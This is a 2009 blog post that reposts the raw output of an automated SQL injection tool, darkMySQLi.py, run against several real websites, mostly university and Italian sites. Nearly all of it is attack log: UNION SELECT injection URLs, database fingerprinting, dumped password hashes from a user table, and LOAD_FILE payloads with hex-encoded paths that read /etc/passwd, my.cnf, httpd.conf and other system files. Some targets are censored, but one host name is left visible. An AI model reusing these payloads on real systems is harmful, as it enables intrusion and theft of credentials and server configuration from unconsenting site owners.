Monday, July 20, 2009

Multiple hosts SQL injection hack log

This appears to be the output of an automatic SQL injection exploit tool run against a few sites. One particular university seems to have been hit hard.

Posted by Anonymous on Fri 17 Jul 22:52
  1.  
  2. |--------------------------------------------------|
  3. | rsauron@gmail.com                         v1.6   |
  4. |   1/2009      darkMySQLi.py                      |
  5. |     -- Multi Purpose MySQL Injection Tool --     |
  6. | Usage: darkMySQLi.py [options]                   |
  7. |                      -h help       darkc0de.com  |
  8. |--------------------------------------------------|
  9.  
  10. [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
  11. [+] 19:13:05
  12. [+] Evasion: + --
  13. [+] Cookie: None
  14. [+] SSL: No
  15. [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
  16. [+] Proxy Not Given
  17. [+] Gathering MySQL Server Configuration...
  18.         Database: lazio
  19.         User: uisp@localhost
  20.         Version: 4.0.25-log
  21. |--------------------------------------------------|
  22. | rsauron@gmail.com                         v1.6   |
  23. |   1/2009      darkMySQLi.py                      |
  24. |     -- Multi Purpose MySQL Injection Tool --     |
  25. | Usage: darkMySQLi.py [options]                   |
  26. |                      -h help       darkc0de.com  |
  27. |--------------------------------------------------|
  28.  
  29. [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
  30. [+] 19:15:02
  31. [+] Evasion: + --
  32. [+] Cookie: None
  33. [+] SSL: No
  34. [+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
  35. [+] Proxy Not Given
  36. [+] Gathering MySQL Server Configuration...
  37.         Database: lazio
  38.         User: uisp@localhost
  39.         Version: 4.0.25-log[+] Beginning table and column fuzzer...
  40. [+] Number of tables names to be fuzzed: 87
  41. [+] Number of column names to be fuzzed: 125
  42. [+] Searching for tables and columns...
  43.  
  44. [+] Found a table called: user
  45.  
  46. [+] Now searching for columns inside table "user"
  47. [-] Done searching inside table "user" for columns!
  48.  
  49. [+] Found a table called: mysql.user
  50.  
  51. [+] Now searching for columns inside table "mysql.user"
  52. [-] Done searching inside table "mysql.user" for columns!
  53.  
  54. [+] Found a table called: news
  55.  
  56. [+] Now searching for columns inside table "news"
  57. [-] Done searching inside table "news" for columns!
  58.  
  59. [-] [19:23:35]
  60. [-] Total URL Requests: 463
  61. [-] Done
  62.  
  63. |--------------------------------------------------|
  64. | rsauron@gmail.com                         v1.6   |
  65. |   1/2009      darkMySQLi.py                      |
  66. |     -- Multi Purpose MySQL Injection Tool --     |
  67. | Usage: darkMySQLi.py [options]                   |
  68. |                      -h help       darkc0de.com  |
  69. |--------------------------------------------------|
  70.  
  71. [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
  72. [+] 19:23:46
  73. [+] Evasion: + --
  74. [+] Cookie: None
  75. [+] SSL: No
  76. [+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
  77. [+] Proxy Not Given
  78. [+] Gathering MySQL Server Configuration...
  79.         Database: lazio
  80.         User: uisp@localhost
  81.         Version: 4.0.25-log
  82. [+] Dumping data from database "lazio" Table "user"
  83. [+] Column(s) ['id_user', 'password']
  84. [+] Number of Rows: 3
  85.  
  86. [1] 1:43d97712a3d49112c478ff42e7a3cd69:
  87. [2] 2:ba50d008b5b8e57b7764d8319369eeb6:
  88. [3] 3:a472c4f62f70e7d432f4444b8c7c1642:
  89.  
  90. [-] [19:23:48]
  91. [-] Total URL Requests: 5
  92. [-] Done
  93.  
  94. |--------------------------------------------------|
  95. | rsauron@gmail.com                         v1.6   |
  96. |   1/2009      darkMySQLi.py                      |
  97. |     -- Multi Purpose MySQL Injection Tool --     |
  98. | Usage: darkMySQLi.py [options]                   |
  99. |                      -h help       darkc0de.com  |
  100. |--------------------------------------------------|
  101.  
  102. [+] URL: http://[CENSORED].edu/article.php?pid=5+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5
  103. [+] 20:51:38
  104. [+] Evasion: + --
  105. [+] Cookie: None
  106. [+] SSL: No
  107. [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
  108. [+] Proxy Not Given
  109. [+] Gathering MySQL Server Configuration...
  110.         Database: linux
  111.         User: linux@web-4.uta.edu
  112.         Version: 5.0.45-log
  113.  
  114. [+] Do we have Access to MySQL Database: NO
  115.  
  116. [-] MySQL user enumeration has been skipped!
  117. [-] We do not have access to mysql DB on this target!
  118.  
  119. [+] Do we have Access to Load_File: NO
  120.  
  121. [-] Load_File Fuzzer has been by skipped!
  122. [-] Load_File disabled on this target!
  123.  
  124. [-] [20:51:45]
  125. [-] Total URL Requests: 3
  126. [-] Done
  127.  
  128. |--------------------------------------------------|
  129. | rsauron@gmail.com                         v1.6   |
  130. |   1/2009      darkMySQLi.py                      |
  131. |     -- Multi Purpose MySQL Injection Tool --     |
  132. | Usage: darkMySQLi.py [options]                   |
  133. |                      -h help       darkc0de.com  |
  134. |--------------------------------------------------|
  135.  
  136. [+] URL: http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+darkc0de,2,3,4,5,darkc0de,darkc0de,8,darkc0de,10
  137. [+] 20:53:38
  138. [+] Evasion: + --
  139. [+] Cookie: None
  140. [+] SSL: No
  141. [+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
  142. [+] Proxy Not Given
  143. [+] Gathering MySQL Server Configuration...
  144.         Database: news
  145.         User: root@jupiter.housing.[CENSORED].edu
  146.         Version: 4.1.20-log
  147.  
  148. [+] Do we have Access to MySQL Database: YES <-- w00t w00t
  149.  
  150. [+] Dumping MySQL user info. host:user:password[+] Number of users in the mysql.user table: 59
  210.  
  211. [+] Do we have Access to Load_File: YES <-- w00t w00t
  212.  
  213. [+] Starting Load_File Fuzzer...
  214. [+] Number of tables names to be fuzzed: 237
  215.  
  216. [!] Found /etc/passwd
  217. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,LOAD_FILE(0x2f6574632f706173737764),LOAD_FILE(0x2f6574632f706173737764),8,LOAD_FILE(0x2f6574632f706173737764),10--
  218. [!] Found /etc/hosts
  219. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f686f737473),2,3,4,5,LOAD_FILE(0x2f6574632f686f737473),LOAD_FILE(0x2f6574632f686f737473),8,LOAD_FILE(0x2f6574632f686f737473),10--
  220. [!] Found /etc/motd
  221. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6d6f7464),2,3,4,5,LOAD_FILE(0x2f6574632f6d6f7464),LOAD_FILE(0x2f6574632f6d6f7464),8,LOAD_FILE(0x2f6574632f6d6f7464),10--
  222. [!] Found /etc/fstab
  223. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6673746162),2,3,4,5,LOAD_FILE(0x2f6574632f6673746162),LOAD_FILE(0x2f6574632f6673746162),8,LOAD_FILE(0x2f6574632f6673746162),10--
  224. [!] Found /etc/httpd/conf/httpd.conf
  225. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),2,3,4,5,LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),8,LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),10--
  226. [!] Found /etc/my.cnf
  227. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6d792e636e66),2,3,4,5,LOAD_FILE(0x2f6574632f6d792e636e66),LOAD_FILE(0x2f6574632f6d792e636e66),8,LOAD_FILE(0x2f6574632f6d792e636e66),10--
  228. [!] Found /etc/sysconfig/network-scripts/ifcfg-eth0
  229. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),2,3,4,5,LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),8,LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),10--
  230. [!] Found /etc/redhat-release
  231. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),2,3,4,5,LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),8,LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),10--
  232. [!] Found /etc/httpd/conf.d/php.conf
  233. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),2,3,4,5,LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),8,LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),10--
  234. [!] Found /etc/group
  235. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f67726f7570),2,3,4,5,LOAD_FILE(0x2f6574632f67726f7570),LOAD_FILE(0x2f6574632f67726f7570),8,LOAD_FILE(0x2f6574632f67726f7570),10--
  236. [!] Found /etc/php.ini
  237. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f7068702e696e69),2,3,4,5,LOAD_FILE(0x2f6574632f7068702e696e69),LOAD_FILE(0x2f6574632f7068702e696e69),8,LOAD_FILE(0x2f6574632f7068702e696e69),10--
  238.  
  239. [-] [21:00:32]
  240. [-] Total URL Requests: 301
  241. [-] Done
  242.  
  243. |--------------------------------------------------|
  244. | rsauron@gmail.com                         v1.6   |
  245. |   1/2009      darkMySQLi.py                      |
  246. |     -- Multi Purpose MySQL Injection Tool --     |
  247. | Usage: darkMySQLi.py [options]                   |
  248. |                      -h help       darkc0de.com  |
  249. |--------------------------------------------------|
  250.  
  251. [+] URL: http://www.[CENSORED].it/lettere_direttore/commenti.php?artid=1165+AND+1=2+UNION+SELECT+1,2,3,darkc0de,5,6,7
  252. [+] 21:08:29
  253. [+] Evasion: + --
  254. [+] Cookie: None
  255. [+] SSL: No
  256. [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
  257. [+] Proxy Not Given
  258. [+] Gathering MySQL Server Configuration...
  259.         Database: [CENSORED]
  260.         User: [CENSORED]@localhost
  261.         Version: 5.0.45-log
  262.  
  263. [+] Do we have Access to MySQL Database: NO
  264.  
  265. [-] MySQL user enumeration has been skipped!
  266. [-] We do not have access to mysql DB on this target!
  267.  
  268. [+] Do we have Access to Load_File: NO
  269.  
  270. [-] Load_File Fuzzer has been by skipped!
  271. [-] Load_File disabled on this target!
  272.  
  273. [-] [21:08:32]
  274. [-] Total URL Requests: 3
  275. [-] Done